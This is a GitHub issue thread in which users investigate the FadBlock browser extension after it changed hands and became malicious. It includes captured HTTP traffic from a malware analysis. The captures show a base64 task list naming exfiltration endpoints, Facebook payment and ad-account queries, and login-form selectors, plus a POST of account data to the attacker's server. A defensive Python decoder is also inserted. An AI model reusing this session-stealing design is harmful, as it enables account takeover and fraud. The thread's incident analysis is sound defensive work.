0x48piraj / fadblock

Friendly Adblock for YouTube: A fast, lightweight, and undetectable YouTube Ads Blocker for Chrome, Opera and Firefox.

DEFCON 1: DO NOT INSTALL / UNINSTALL 'FADBLOCK' IMMEDIATELY FROM YOUR CHROME #157

Closed JaielZeus closed 4 months ago

JaielZeus commented 5 months ago

The extension was updated overnight and now needs more intrusive permissions on Chrome to work again. I would like to know the reason why you need that @0x48piraj? I would think reading the data from youtube.com is already enough for this extension to work, wouldn't you say so too? What is the reason here? I am really hesitant re-enabling it and this sucks, especially since I paid for premium and now the extension becomes intrusive like that.


fabriziocarloni commented 5 months ago

@0x48piraj What I would like to know for sure is what data is really sent to the fadblock.pro domain. In addition to the history of sites visited and I think the cookies of active sessions. I would like to make sure that nothing else is sent such as credentials stored on chrome or anything else. Please is there anyone among us who can do an in-depth analysis to definitively clarify this thing? I think knowing this is very important for all of us.

twer1775 commented 5 months ago

@0x48piraj Hello, may I ask if it's possible for you to delete the registry key from the Windows Registry Editor or remove the specific string from the registry within the browser? Thank you for your efforts.

0x48piraj commented 5 months ago

Yeah, knowing the impact would help a lot @fabriziocarloni. As @poka-IT investigated, he ran and saw the outgoing/incoming requests and it seems like it doesn't exfil anything as of now. I found the same thing when I let it run in a separate profile. And there have been no new updates since the 24th.

I'm reading the code you provided, I don't see any malicious code on my side. External requests are only made to https://fadblock.pro/check/extension, just fetching data; it doesn't seem to send anything there.

Response is

{"sstcode":200,"fad1":"https:\/\/play.google.com","fad2":"play.google.com","fad3":"6000","fad4":"videoplayback","fad5":"https:\/\/www.youtube.com\/youtubei\/v1\/notification\/get_unseen_count","fad6":"https:\/\/googleads.g.doubleclick.net\/pagead\/id?v=","fad7":"https:\/\/www.youtube.com\/youtubei\/v1\/player","fad8":"https:\/\/play.google.com\/log?format=json&hasfast=true&authuser=0","fad9":"video-","fad10":"100","fad11":"50","fad12":"https:\/\/jnn-pa.googleapis.com\/$rpc\/google.internal.waa.v1.Waa\/Create"}

So probably just metadata for analytics as you said. Probably logging the IP address, that's it. But I'm just a Linux sysadmin, not a security expert; maybe I missed something.

@twer1775, I don't understand, what registry key? I don't think Windows Registry keys come into the scope of this project.

fabriziocarloni commented 5 months ago

@0x48piraj and @poka-IT I analyzed the computer where the extension with the malicious code was installed and I came to the conclusion that this extension most likely caused the hack. But please, I would like your help in finding concrete evidence because it could also help everyone else who has installed it. I don't think it's a coincidence that a few days after having given permission to read and modify all the data on all the websites we were hacked on Facebook. I really hope I'm wrong but I don't think so.

0x48piraj commented 5 months ago

@fabriziocarloni, I have submitted the malicious bit to various AV sandboxes - since I haven't delved into extensive JS reverse engineering before, it's taking some time to grasp the code. If anyone is willing to help, please feel free to contribute.

poka-IT commented 5 months ago

@0x48piraj I'm sorry but I don't want to act as a guarantor in this story; everything I did I wrote here, because I had time to do this. I said I'm not a security expert, just a sysadmin; I deobfuscated the suspicious file and provided a first analysis, but I didn't "run and see the outgoing/incoming requests", I said this is what should be done. Or analyse the local storage state deeper.

I'm ok to contribute more but with one condition: upgrade this repo to an AGPLv3 license or equivalent. This in no way prevents you from continuing to ask for tips for your work. Actually there is no license, and the trade under it is completely opaque. This is the only way you could expect contributors on this project.

fabriziocarloni commented 5 months ago

Thanks @0x48piraj, I hope someone of good will wants to contribute to helping us understand what this extension really does. I see it as a challenge. I am not a security expert, and if no one wants to help us discover the truth, as soon as I have time I would like to try installing this extension with malicious code in a sandbox and, with Wireshark, try to analyze the data traffic towards fadblock.pro. For me it is important to understand it.

seebeedub commented 5 months ago

Maybe ask the current owner / developer what they did? They may be less malicious than we suspect they are.


fabriziocarloni commented 5 months ago

@seebeedub If they have inserted malicious code that sends cookies with username and password to their servers I don't think they will ever be honest.

MayouKurayami commented 5 months ago

@0x48piraj

in my defense, I thought I took precautions to ensure the buyer wouldn't use it maliciously, but it exchanged hands again. I transferred the extension because I believed it could benefit all users.

Sure, to give you the benefit of the doubt, let's assume that you didn't expect the buyer to be malicious and also did not expect another change of hands.

But would you mind explaining why the user base was never informed of the change of ownership, a significant and potentially concerning event, prior to its occurrence?

poka-IT commented 5 months ago

@fabriziocarloni are you sure your Facebook account has been hacked? Did you just receive an SMS from "Facebook" giving you a 2FA code? If yes, you have not been hacked, just spammed.

And I don't know what you mean by "someone of good", but the good thing to do here is to declare this app as libre software, with a good license. It seems that you have no problem using a program without an associated license?

fabriziocarloni commented 5 months ago

@poka-IT I'm an IT system engineer too and when I tell you that we were hacked it's the truth. The hack occurred with the copy of the active cookies and I am 100% sure of this.

I don't want to go into the licensing issue but I would just like to understand if this extension with malicious code sent other data besides cookies. That's all I would like to know.

mnapoli commented 5 months ago

The "sell licenses then resell the software shortly after" was a bad move IMO. Then unfortunate things happened, that's bad.

But thank you for handling things as best as you could have done after the bad things happened. Warning users, re-uploading the extension, and preserving licenses, was the hard but right step. I'm sure it wasn't easy for you, thank you.

fabriziocarloni commented 5 months ago

I analyzed the network traffic with wireshark and I confirm that the extension with the malicious code was designed to send active Facebook session cookies to the fadblock.pro 80.240.21.36 server to hack accounts. In fact, when you are connected to Facebook, data is sent continuously to their server, which is not the case with other sites.

Here is an example of what is sent:

:method: POST
:authority: fadblock.pro
:scheme: https
:path: /check/extension
content-length: 0
accept: application/json, application/xml, text/plain, text/html, .
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
content-type: application/json
origin: chrome-extension://mdadjjfmjhfcibgfhfjbaiiljpllkbfc
sec-fetch-site: none
sec-fetch-mode: cors
sec-fetch-dest: empty
accept-encoding: gzip, deflate, br
accept-language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7
cookie: XSRF-TOKEN=eyJpdiI6Im5BdVd0NDhkQ1JRWFo4RTRlVURxbXc9PSIsInZhbHVlIjoicU83OEtPa2JnV3Bib3RSSnpMcFhGYmlMMmdJSGhmRDQrSWJnM21JYUgrZjhMaWdmdWMrRXJXd1doWWxrcDBGUCIsIm1hYyI6IjRmYmNiMjkwNDYyNDE5ODUwZDcyZTgyMjhlMjA1YWRhNGVlYTU4ZWY1YzQwOTkyZTNhYTZjOGNlODVlM2UzZjQifQ%3D%3D
cookie: laravel_session=eyJpdiI6IklkaEJVTEk5REtFMWdiWUMwRzZpT2c9PSIsInZhbHVlIjoiWTRNY3ZJV3pFVDE2T21aZWIwSDlRUTRidDdzMjdXSzEySnMwSjlqNXNoMTVpQnlIb29zR3RGXC9RTHVadXB4WEMiLCJtYWMiOiIwNTI0MzU2NzA5YWU1ZWY1OWI1YmU2ZTY1MzYzODgzYjZkYzcyOWU5NjRjMTgzZWI1NzNjYzU2OTE4YzUyYjIyIn0%3D

:status: 200
server: nginx
content-type: text/html; charset=UTF-8
x-powered-by: PHP/7.4.33
cache-control: no-cache, private
date: Sat, 03 Feb 2024 02:35:44 GMT
set-cookie: XSRF-TOKEN=eyJpdiI6IllkM3JmMDZ6b3VKRTQwOXdKUWdPMGc9PSIsInZhbHVlIjoibUNyZkttR1N5UEhqdVwvczhvZmtwa0JzODA1bHQzYTNBV3YraExZZW9qTEkxNFFJZGpmV25INW9cL2lHVUo2QUc0IiwibWFjIjoiMWY5YmM5ZmZmY2U2NTgwMjE2M2U2MGQ2OGExNzNlNzdjZmRjZDdmMjZiOGJiODdkY2ViOTVkNDkzMjIzMmRkOCJ9; expires=Sat, 03-Feb-2024 04:35:44 GMT; Max-Age=7200; path=/
set-cookie: laravel_session=eyJpdiI6Ims4ZGsxdm53TyswK2VpTDRRRjY5aXc9PSIsInZhbHVlIjoiWU10QzlcL0pZcnhYSk85UHhOK3U2MUFISmtTWFpwb1krSG5vMTU4U3NRZEV1VE1pWnZsZ0F4WlZFSFJzbEV6UkkiLCJtYWMiOiIwNWM5NmEwNWNhZGQyYWEzOTRiOGZmZTdmZGU5OWVlNDg1MTQ1YThkZmM1NmRhMjlmYjU3MGU0YjIxYzkwNmYzIn0%3D; expires=Sat, 03-Feb-2024 04:35:44 GMT; Max-Age=7200; path=/; httponly
content-encoding: gzip

{"sstcode":403,"fad1":"aHR0cHM6Ly9hcGkuZmFkYmxvY2sucHJvL2FwaS9mYWRibG9ja1NhdmU=","fad2":"ZmFjZWJvb2suY29t","fad3":"Y29va2ll","fad4":"dXNlckFnZW50","fad5":"aHR0cHM6Ly9idXNpbmVzcy5mYWNlYm9vay5jb20vYWRzL2FkX2xpbWl0cw==","fad6":"aHR0cHM6Ly9ncmFwaC5mYWNlYm9vay5jb20vdjE4LjAvbWUvYnVzaW5lc3Nlcy8\/ZmllbGRzPWlkLG5hbWUsdmVyaWZpY2F0aW9uX3N0YXR1cyxjcmVhdGVkX3RpbWUsb3duZWRfYWRfYWNjb3VudHN7aWQsbmFtZSxhbW91bnRfc3BlbnQsaW5zaWdodHMuZGF0ZV9wcmVzZXQobWF4aW11bSl7c3BlbmR9LGFjY291bnRfY3VycmVuY3lfcmF0aW9fdG9fdXNkLHNwZW5kX2NhcCxjdXJyZW5jeSxhY2NvdW50X3N0YXR1cyxhZHNwYXltZW50Y3ljbGV7dGhyZXNob2xkX2Ftb3VudH0sZnVuZGluZ19zb3VyY2VfZGV0YWlscyxhZHRydXN0X2RzbCxhbGxfcGF5bWVudF9tZXRob2Rze3BtX2NyZWRpdF9jYXJke2Rpc3BsYXlfc3RyaW5nLGV4cF9tb250aCxleHBfeWVhcn0scGF5bWVudF9tZXRob2RfZGlyZWN0X2RlYml0c3tjYW5fdmVyaWZ5LGRpc3BsYXlfc3RyaW5nLGlzX2F3YWl0aW5nLGlzX3BlbmRpbmcsc3RhdHVzfSxwYXltZW50X21ldGhvZF9wYXlwYWx7ZW1haWxfYWRkcmVzc319fSxvd25lZF9wYWdlc3tpZCxuYW1lLGZvbGxvd2Vyc19jb3VudCx2ZXJpZmljYXRpb25fc3RhdHVzfSxwZXJtaXR0ZWRfcm9sZXMsYnVzaW5lc3NfdXNlcnN7ZW1haWwscGVuZGluZ19lbWFpbCxuYW1lLHJvbGV9JmFjY2Vzc190b2tlbj0=","fad7":"aHR0cHM6Ly9ncmFwaC5mYWNlYm9vay5jb20vdjE4LjAvbWUvP2ZpZWxkcz1uYW1lLGJpcnRoZGF5JmFjY2Vzc190b2tlbj0=","fad8":"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","fad9":"RUFB","fad10":"aW5wdXRbbmFtZT0icGFzcyJd","fad11":"aW5wdXRbbmFtZT0iZW1haWwiXQ==","fad13":"Zm9ybQ==","fad14":"cXIvc2hvdy9jb2Rl","fad15":"aHR0cHM6Ly9hcGkuZmFkYmxvY2sucHJvL2FwaS9zYXZlUVI=","fad12":"aHR0cHM6Ly9mYWNlYm9vay5jb20vbWU=","fad16":"YQ==","fad17":"Y2xpY2s=","fad18":"c3Jj","fad19":"aHR0cHM6Ly93d3cuZmFjZWJvb2suY29tL3NlY3VyaXR5LzJmYWMvc2V0dGluZ3Mv","fad20":"bG9naW4vcmVhdXRo"}
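The sstcode-403 body above is a task list whose values are base64-encoded, which is why it looks opaque next to the earlier sstcode-200 body. The decoder below is an added example, not code from this thread or from the extension: it parses both captured bodies (a subset of the fields, copied from the thread; fad6 is left out for length and fad8, whose value is not on the page, is a placeholder), decodes only the values that are well-formed base64 yielding printable text, leaves everything else untouched, and summarizes the hosts, form selectors and keywords a defender would want to see.

```python
import base64
import binascii
import json
import string
from urllib.parse import urlparse

# Subsets of the two /check/extension responses captured in this thread.
# Values are copied from the thread; fad8 is a placeholder (not valid base64)
# because its value was removed from the page.
EARLY_RESPONSE = ('{"sstcode":200,"fad1":"https:\\/\\/play.google.com","fad2":"play.google.com",'
                  '"fad3":"6000","fad4":"videoplayback","fad9":"video-","fad10":"100"}')
LATE_RESPONSE = ('{"sstcode":403,'
                 '"fad1":"aHR0cHM6Ly9hcGkuZmFkYmxvY2sucHJvL2FwaS9mYWRibG9ja1NhdmU=",'
                 '"fad2":"ZmFjZWJvb2suY29t","fad3":"Y29va2ll","fad4":"dXNlckFnZW50",'
                 '"fad5":"aHR0cHM6Ly9idXNpbmVzcy5mYWNlYm9vay5jb20vYWRzL2FkX2xpbWl0cw==",'
                 '"fad7":"aHR0cHM6Ly9ncmFwaC5mYWNlYm9vay5jb20vdjE4LjAvbWUvP2ZpZWxkcz1uYW1lLGJpcnRoZGF5JmFjY2Vzc190b2tlbj0=",'
                 '"fad8":"<value-removed-from-page>","fad9":"RUFB",'
                 '"fad10":"aW5wdXRbbmFtZT0icGFzcyJd","fad11":"aW5wdXRbbmFtZT0iZW1haWwiXQ==",'
                 '"fad13":"Zm9ybQ==","fad15":"aHR0cHM6Ly9hcGkuZmFkYmxvY2sucHJvL2FwaS9zYXZlUVI=",'
                 '"fad12":"aHR0cHM6Ly9mYWNlYm9vay5jb20vbWU=",'
                 '"fad19":"aHR0cHM6Ly93d3cuZmFjZWJvb2suY29tL3NlY3VyaXR5LzJmYWMvc2V0dGluZ3Mv",'
                 '"fad20":"bG9naW4vcmVhdXRo"}')

PRINTABLE = set(string.printable)


def maybe_base64(value):
    """Return the decoded text if value is strict base64 that decodes to
    printable UTF-8, otherwise None (so plain URLs, numbers and the
    placeholder are left alone instead of being mangled)."""
    if not isinstance(value, str) or not value or len(value) % 4:
        return None
    try:
        text = base64.b64decode(value, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None
    if not text or any(ch not in PRINTABLE for ch in text):
        return None
    return text


def decode_config(body):
    """Parse a /check/extension body; decode base64 fields, keep the rest as-is."""
    decoded = {}
    for key, value in json.loads(body).items():
        text = maybe_base64(value)
        decoded[key] = value if text is None else text
    return decoded


def summarize(decoded):
    """Hosts the task list points at, input selectors it names, and bare
    keywords (cookie / userAgent) that hint at what gets collected."""
    hosts, selectors, keywords = set(), [], []
    for value in decoded.values():
        if not isinstance(value, str):
            continue
        if value.startswith("https://"):
            hosts.add(urlparse(value).netloc)
        elif value.startswith("input["):
            selectors.append(value)
        elif value in ("cookie", "userAgent"):
            keywords.append(value)
    return {"hosts": sorted(hosts), "selectors": sorted(selectors),
            "keywords": sorted(keywords)}


if __name__ == "__main__":
    for label, body in (("early", EARLY_RESPONSE), ("late", LATE_RESPONSE)):
        cfg = decode_config(body)
        print(label, json.dumps(summarize(cfg)))
        for key, value in cfg.items():
            print(f"  {key}: {value}")
```

Run as-is, the early body yields only play.google.com and no selectors, while the late one resolves to api.fadblock.pro plus Facebook endpoints, the email and password input selectors, and the cookie / userAgent keywords.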

fabriziocarloni commented 5 months ago

The serious thing is that anyone who installs the extension with malicious code for the first time does not receive any notification regarding the increase in required permissions, which instead happened with the update. For now I am sure that this extension is activated to steal session cookies from Facebook but I do not exclude that it could also happen from other sites that I have not yet had the opportunity to test.

fabriziocarloni commented 5 months ago

When you are logged in to Facebook, the extension with the malicious code also sends the user's data including financial data to the api.fadblock.pro 149.248.56.63 server:

:method: POST
:authority: api.fadblock.pro
:scheme: https
:path: /api/fadblockSave
content-length: 1515
accept: application/json, application/xml, text/plain, text/html, .
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
content-type: application/json
origin: chrome-extension://mdadjjfmjhfcibgfhfjbaiiljpllkbfc
sec-fetch-site: none
sec-fetch-mode: cors
sec-fetch-dest: empty
accept-encoding: gzip, deflate, br
accept-language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7

{"fad":"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","fad_ana":"[]","fad_context":"[{\"account_currency_ratio_to_usd\":0.9303347825,\"name\":\"Name Surname\",\"account_status\":1,\"currency\":\"EUR\",\"amount_spent\":\"0\",\"spend_cap\":\"0\",\"adtrust_dsl\":46.52,\"id\":\"act_429256876109265\"}]"}

:status: 200
server: nginx
content-type: application/json
x-powered-by: PHP/7.4.33
cache-control: no-cache, private
date: Sat, 03 Feb 2024 17:20:23 GMT
x-ratelimit-limit: 600
x-ratelimit-remaining: 599
access-control-allow-origin: *

{"message":"Verified","stt":false}

Now there is no longer any doubt that the hack we had was caused by this extension with malicious code looking for Facebook accounts with a credit card connected to then advertise by spending the money of unsuspecting users. This is all very heavy.

fabriziocarloni commented 5 months ago

@0x48piraj This should be reported to Google to have the extension with the malicious code removed immediately. It cannot be left so downloadable by everyone. Please do everything you can to have it removed.

JustinGITUB commented 5 months ago

How to completely uninstall fadblock or fadblock original? Thanks for the advice.

fabriziocarloni commented 5 months ago

@JustinGITUB To completely uninstall fadblock just remove this extension from chrome.

0x48piraj commented 5 months ago

@fabriziocarloni, I have emailed everyone who supported to report the extension days before.

fabriziocarloni commented 5 months ago

@0x48piraj Unfortunately what you did isn't enough. Before it does any more damage, everything must be done to ensure that Google removes the extension with malicious code from the Chrome Web Store. Whoever manages this extension has no shame; look what they added in the description. I have no words.

"UPDATE: If you were a user before the update and the extension got disabled, that's normal behavior by Google, it's so an extension can't silently escalate its privileges with an update, in this case FadBlock accessing extensionpay.com for those who want to contribute, nothing else. Nothing to be scared about. You can read the new permissions to make sure nobody's pulling any funny business.

NOTE: And for those who are alarmed about the "Read and change your data" permission, it's not accessing any of your data, it's just to access the YouTube and YouTube Music (new feature!) tabs as it was doing before. You can read the documentation to make sure that's the case,

This is the permission required for an extension to work with the browser's tabs. This includes viewing the URL of an open tab. The permission does not give access to your actual browser history itself, but technically any extension with this permission could monitor tab URLs as they changed and construct its own history, so that's why the warning is phrased that way. If an extension asks for permission to access the actual browser history data, the warning should read "Read and change your BROWSING HISTORY...".

https://developer.chrome.com/docs/extensions/mv3/permission_warnings/

You can google this and find out, no need to trust the developer."

fabriziocarloni commented 5 months ago

@0x48piraj I did my part by demonstrating that that malicious code doesn't just send the Chrome history but does something more important by sending cookies from active sessions on Facebook to then easily hack the accounts. But now it's up to you to do everything you can to get Google to remove it from its Chrome Web Store. I don't want what happened to us to happen to others.

Nicos18 commented 5 months ago

@fabriziocarloni In the last few days I was receiving several emails on different occasions because someone asked to reset my password (not me).

Maybe the 2FA on my account avoided the issue.

Is this connected to the extension or could it be something else?

Uhm...

fabriziocarloni commented 5 months ago

@Nicos18 We also had 2FA active, but when they copy your cookies they replicate the connection you have (in our case to Facebook), and to enter your account they don't even need a password, and you realize the damage when it's too late. I believe the only salvation is the use of a physical key like a passkey, which should protect you from this type of attack.

Rynn21 commented 5 months ago

I disabled the extension over a month ago because it was repeatedly asking for a donation. Today Chrome comes up with this, so I deleted the extension entirely. AdNauseum is so good. Haven't looked back for a while. Fadblock has been sketchy from the start.

fabriziocarloni commented 5 months ago

@Rynn21 I'm glad that Chrome finally sees this as an extension that contains malware. I just hope they delete it from the Chrome Web Store as soon as possible otherwise it will continue to cause damage.

fabriziocarloni commented 5 months ago

It appears that the version of fadblock with malicious code has been removed from the Chrome Web Store (see https://chromewebstore.google.com/detail/fadblock-friendly-adblock/mdadjjfmjhfcibgfhfjbaiiljpllkbfc). I hope it's not a coincidence and that it's true.

Rynn21 commented 5 months ago

No one should install anything named Fadblock again. Change your passwords too.

fabriziocarloni commented 5 months ago

@Rynn21 The original extension had changed hands and was then modified with malicious code. After this bad experience I will pay much more attention to the extensions to install on Chrome.

WongIong commented 5 months ago

What can we do right now? Does changing the password also invalidate your cookies? @fabriziocarloni

Rynn21 commented 5 months ago

@Rynn21 The original extension had changed hands and was then modified with malicious code. After this bad experience I will pay much more attention to the extensions to install on Chrome.

Yes. A lot of people online are sharing the extent of how sketchy the extension was and is, including things about the author.

fabriziocarloni commented 5 months ago

@WongIong When a user changes their own password, the authorization cookies that were created earlier still work. In the specific case of Facebook you should connect to this page https://accountscenter.facebook.com/password_and_security and disconnect all active sessions, and then also change the password for security.

moemisaka9 commented 5 months ago

Does the malicious code do anything on websites other than Facebook? If I didn't use Facebook at all before I uninstall the extension today should I worry about anything?

fabriziocarloni commented 5 months ago

@moemisaka9 It was certainly active in stealing session cookies from Facebook. However, I don't rule out that it was also active for other sites that I didn't have the opportunity to test.

Nicos18 commented 5 months ago

As a precaution, I logged out from all sessions and changed the password for both Facebook and Instagram, as they are deeply connected.

I can't change passwords on other sites as I have too many passwords to change and it would have taken weeks.

Rynn21 commented 5 months ago

Hmm...some thread comments appear to be deleted compared to the e-mailed updates I saw.

SAABoy commented 5 months ago

@Rynn21 are you sure you didn't skip past a "load more" button? Here's a pic.

Rynn21 commented 5 months ago

@Rynn21 are you sure you didn't skip past a "load more" button? Here's a pic.

Positive.

That1BlueMew commented 5 months ago

@Rynn21 oh, I sent one item here and deleted it because I thought it was not needed here, if that's what you're talking about.

Panadoc commented 5 months ago

Any news what data/sites was compromised? (other than facebook)

Cynosphere commented 5 months ago

I am no longer the owner of the extension. I sold it over a month ago

First the open core stunt and then you sold the extension and didn't expect it to be riddled with malware??? There's no way you're this money starved to be this incompetent. I'm glad I took matters into my own hands to just use the userscript whenever YouTube keeps trying to block uBlock.

This is why I absolutely hate small things that could be userscripts being full extensions and cringe every time I see people with Return YouTube Dislike as an extension (though I really wish they would stop neglecting the userscript).

You got what you deserved honestly. Just a shame you had to bring down innocent people with you.

Rynn21 commented 5 months ago

@Rynn21 oh, I sent one item here and deleted it because I thought it was not needed here, if that's what you're talking about.

It was someone else, but they probably deleted their chain of replies.

MGuerrera commented 5 months ago

@0x48piraj have you finished inspecting the code? Are there any other websites we should be worried about besides Facebook and Instagram?

MGuerrera commented 4 months ago

@0x48piraj have you finished inspecting the code? Are there any other websites we should be worried about besides Facebook and Instagram?

@0x48piraj I need to have an answer, the threat is serious.

I need to know if I have to start changing dozens and dozens of passwords.

0x48piraj commented 4 months ago

@MGuerrera, the extension was deleted about a week ago - because of my efforts going back and forth with Google Devs and making them manually review and remove the extension as it would have taken months otherwise because of the positive reviews and downloads.

If you were in danger, you would have already gotten breach emails like some did - if not - you're safe - it was scrubbed under a week after the update - their server wasn't even online on the first two days - so the exposure was low, to begin with, thankfully.

0x48piraj commented 4 months ago

Now that the extension was removed globally, there's no reason to keep the issue alive. Closing.